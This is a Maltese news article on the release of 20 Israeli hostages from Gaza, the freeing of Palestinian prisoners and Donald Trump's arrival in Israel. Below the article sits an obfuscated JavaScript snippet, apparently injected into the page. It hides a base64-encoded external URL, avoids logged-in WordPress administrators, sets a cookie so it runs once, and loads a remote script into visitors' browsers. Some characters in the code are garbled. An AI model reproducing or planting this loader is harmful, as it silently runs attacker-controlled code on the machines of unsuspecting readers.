Internazzjonali

Jinħelsu 20 ostaġġ Iżraeljani minn Gaza

Matul it-Tnejn filgħodu nħelsu l-ostaġġi kollha ħajjin Iżraeljani minn Gaza. Huma nqasmu f’żewġ gruppi, hekk kif kmieni filgħodu nħelsu 7 mbad ftit wara nħelsu 13 oħra.

Il-katavri ta’ madwar 28 ostaġġ Iżraeljan mistennija jittieħdu lura Iżrael fis-sigħat li ġejjin.

Dan ġie kkonfermat kemm mill-Hamas, kif ukoll mill-armata Iżraeljana.

Minn naħa tagħhom l-Iżrael bdew jeħilsu l-priġunieri Palestinjani mill-ħabs Ofer fl-Iżrael. B’kollox mistennija jinħelsu 250 priġunier Palestinjan u 1,700 ostaġġ Palestinjan, inklużi 22 tifel u tifla, fis-sigħat li ġejjin.

Għall-ħabta tal-11:30 ta’ filgħodu, l-ewwel 38 xarabank bil-priġunieri Palestinjani waslu f’Gaza, b’iżjed priġunieri mistennija jaslu fil-ħin li ġej.

Waqt li għaddej ir-rilaxx tal-ostaġġi, l-President Amerikan Donald Trump wasal fl-ajruport ta’ Ben Gurion f’Iżrael hekk kif hu se jkun qed jagħmel żjara qasira fil-pajjiż. Trump hu mistenni jingħata l-ogħla unur ċivili ta’ Iżrael, il-Midalja Presidenzjali ta’ Unur Iżraeljana. Dan il-premju jirrikonoxxi l-isforzi ta’ Trump biex jassigura l-ħelsien ta’ 48 ostaġġ miżmuma mill-Hamas, fejn 20 minnhom huma maħsuba li għadhom ħajja.

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();